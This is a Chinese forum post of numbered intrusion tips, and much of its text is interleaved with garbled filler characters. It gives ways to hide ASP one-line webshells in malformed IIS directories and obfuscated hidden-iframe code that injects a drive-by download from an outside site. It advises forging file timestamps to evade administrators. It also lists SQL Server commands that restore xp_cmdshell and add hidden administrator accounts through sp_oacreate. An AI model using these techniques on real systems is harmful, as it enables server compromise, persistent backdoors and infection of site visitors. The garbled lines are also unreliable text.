拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
' D1 f0 z% r( J8 A2 `; _通过web访问ASP木马:http://ip/images../news.asp?action=login
0 a/ z$ p; _0 r- ?如何删除非标准目录:rmdir images..\ /s, @, Y. |9 g2 \! ]- ~; D: V! S
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
8 [- w6 l& |2 I+ K# W, dmkdir programme.asp6 U6 x2 i0 w1 O/ c+ P0 A! o( s
新建1.txt文件内容:<!--#include file=”12.jpg”-->6 d* _: c7 y* T
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
" x1 x& K, h; d5 S( o0 a9 R% }4 c7 Uattrib +H +S programme.asp4 Q0 M) X# u+ U* L, E! Y5 M; @
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
7 E2 b$ ?- X P# u7 \5 C+ L
! {) g# t) W( B( o( d; g. |- g: j6 `54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。" U% z; b6 b+ h$ B4 }2 g3 J6 h
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。4 i( ^4 n3 `0 T; q" x) h
! u$ l$ O8 [& m* G) Y9 ^
55、JS隐蔽挂马
1 r8 D3 L( C, J: L1.
. B6 N2 G, l" b$ c Xvar tr4c3="<iframe src=ht";
; A2 J: V/ K0 B) D) Ltr4c3 = tr4c3+"tp:/";3 \8 M0 O5 W( D
tr4c3 = tr4c3+"/ww";
( |2 f- m! F# P# K# b" J/ mtr4c3 = tr4c3+"w.tr4";* N0 M9 c% N/ L8 E, l5 [
tr4c3 = tr4c3+"c3.com/inc/m";
. |8 E) j1 j1 H6 \1 Qtr4c3 = tr4c3+"m.htm style="display:none"></i";
& T- j; @3 D* V2 Y7 @" Mtr4c3 =tr4c3+"frame>'";. S7 c# F" W" G% y1 |
document.write(tr4c3);7 o$ P# P, _8 l/ X
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
+ q$ i2 N A8 R) I# ^
" V" ^3 t7 o6 s; y; ~3 i' R8 y2.. w' w* [$ B) V8 V( J. J
转换进制,然后用EVAL执行。如
% |8 B5 S3 G2 z- Ieval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");6 v+ o' }& K. j, }& @& g' H
不过这个有点显眼。
4 ?) B" t/ P. Y! T3.
5 {* i4 W F3 z5 z3 N" qdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
0 o+ L1 ?" p" N最后一点,别忘了把文件的时间也修改下。
^; B7 s) E, o# {+ C
& v/ Q" ~6 q N9 I, a4 o+ b3 H5 z! e56.3389终端入侵常用DOS命令/ D# o2 u. x0 L. I. P1 D# o
taskkill taskkill /PID 1248 /t( B d+ ?7 W! C
! ]) d- V4 V7 ]2 ^: P; D
tasklist 查进程
3 H% o0 T4 }0 @% Z, A2 Q1 w7 Y& K7 Q
1 o/ \. H4 N. |cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
- @; O: C$ L8 I/ P7 Niisreset /reboot* {, D. G6 V! Q" t7 U8 m$ k
tsshutdn /reboot /delay:1 重起服务器+ S3 `: Y+ Q2 f9 O* }* _: ~
; D3 x% K/ t4 m6 X; K% ~1 L( S+ A \
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
' ~, Y) W$ g* b- i6 W- t
7 e; ^" D+ o' f, p& A [7 o3 \7 hquery user 查看当前终端用户在线情况
0 U* G) m- o; s+ v k G4 {) B5 f8 R' E; h e
要显示有关所有会话使用的进程的信息,请键入:query process *# e9 l) y% ` @ e; b# H3 j7 n0 ^+ o8 X
" L+ `% U3 ^/ F: i+ n9 t' Z
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
( n- n( l s% I$ p- |4 \1 [: H G1 m3 i; a: O& n% h" z
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2* k+ d' k$ k( r8 o0 q6 y
8 b' V8 M5 G% q9 j; z6 U1 w要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02' s1 E! y6 \- K4 O/ [+ ^7 J, U
$ U1 ]8 V. _, f( Q5 @; y命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
3 F( o* B, R5 @6 |
1 k& Z9 x( _2 }3 @7 K2 Q命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统1 `4 K7 S0 L* G# H% U2 ~" q8 ]$ F
, G" I$ p: k1 i# u; w; ?4 v7 s+ q命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
3 E! [$ p& P4 t4 M4 W2 V% p7 t8 K; P4 L+ B7 z& h$ \2 H1 {1 U j& q
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
' R6 Q- N) P3 V8 z/ x C, g, k, k! U* T! o1 G
56、在地址栏或按Ctrl+O,输入:; H9 |$ ]7 i# C2 I+ G5 s t
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
3 E' u# }3 K+ K3 _/ T5 f6 b' t9 i
4 S- ]: I3 @1 d. i2 B源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
4 N9 ~5 z6 w: V; A
0 Z6 P5 G, J9 h' _0 d57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
. |' [3 ]" V! x. L3 L* I$ X) \4 g w5 M用net localgroup administrators是可以看到管理组下,加了$的用户的。6 }6 B# ?: K8 M, K; L$ }
5 z, |* E3 k$ N% m# z4 o9 r
58、 sa弱口令相关命令' ~" c( W8 y6 Z. g8 B
0 s8 {. m. j3 E3 g4 U k. W. m% Q( {& Q一.更改sa口令方法:
' P j2 i$ x- k9 L b用sql综合利用工具连接后,执行命令:% Q l7 v2 Q- A+ \" ?9 j; b
exec sp_password NULL,'20001001','sa'
0 i0 J, V ]3 h, }7 Q1 f(提示:慎用!)
4 ]: Q9 q( T* _, L4 a
( _6 d7 ^# E; K* b4 L: W y I L二.简单修补sa弱口令.3 c, L6 }; E# ~5 x. l$ u! A
6 X1 F% Y' R8 b3 t' f; @2 X( _; L. O
方法1:查询分离器连接后执行:" G/ S$ `2 S4 k4 ^
if exists (select * from9 o% j( G7 N4 |" r
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and% \. B* b2 v9 c: `9 p
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)& _4 ?! A8 g9 H% w
* H1 g3 E& X$ c, y( {2 v- A
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
( Q3 P3 `9 _: d) P! S5 V
& I8 @6 W7 _8 CGO
5 D! o/ ~8 y4 H w( \8 q8 B, T. F
! r3 J& D) d4 Y& S然后按F5键命令执行完毕
1 G' i0 u! Z' Q& M0 m4 C q$ G( R0 A' @+ b
方法2:查询分离器连接后+ |& Q; [" K% D4 s# @3 G% c4 u+ _
第一步执行:use master
9 p( E" s+ W; i$ u第二步执行:sp_dropextendedproc 'xp_cmdshell', `. N% d4 c8 B& b6 I+ C$ i
然后按F5键命令执行完毕3 W+ ]- ]- @3 [" A
; }" A; t2 Q; S% D: t3 U+ L
+ G4 j+ ]) h- ~* b三.常见情况恢复执行xp_cmdshell.; \6 n0 H4 \# R$ w
& W! x1 O7 ^8 d$ O. b
. A' ~4 C+ w4 o( d! o8 R
1 未能找到存储过程'master..xpcmdshell'.4 m' l" n# j, e+ [
恢复方法:查询分离器连接后,
5 X6 U! u( |1 o/ ~第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int; l) ?8 A4 E* V! M& ]
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
: P ^6 }7 l2 L' |4 a5 c4 {+ g* G然后按F5键命令执行完毕& d* @9 n5 W$ r5 Y3 D
% }( U8 ?: g" Z. H
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)7 \0 H6 _& @, N* F1 [
恢复方法:查询分离器连接后,
0 a7 `! [5 u6 a第一步执行:sp_dropextendedproc "xp_cmdshell"& F/ I; k$ x0 @' Q/ ?
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
1 r9 Z6 }" z9 a5 n( X1 \然后按F5键命令执行完毕, [) {- n, n0 }$ h6 e3 K
/ ?% \4 b9 f7 g' D) X3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
+ B% w- |0 S) g/ r5 T' M+ c/ J恢复方法:查询分离器连接后,# n& J8 z4 m; ?0 R
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'2 O: G" F* X) n n3 S
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
6 s. {4 t& ?. x4 U2 p然后按F5键命令执行完毕
\9 K/ l1 i3 D+ I( J8 H
# P) X8 {6 z' i7 n2 \+ h2 c( n四.终极方法.
3 s5 F$ m, I) b1 X如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:! v2 L2 d8 u8 [
查询分离器连接后,
+ r" m: k& U! q, H& E2000servser系统:
0 b" C* w& G- O" ?declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
( r5 [8 B' @. S+ l. t' o2 s% w7 A/ \6 l6 q6 t) c" T
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'# T# b3 M+ Y: j' y
, V9 ^) k) |$ b
xp或2003server系统:
; T* J# q4 b: _$ d+ Y' I! z, K/ L/ E( J
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
2 L( A6 T, {! w8 D
5 R2 a& c% a4 Q' Q. w$ k4 f. v; Rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'- ]: t! n4 l8 }: V3 {' h
|
发表于 2012-9-15 14:13:15
收藏
支持
反对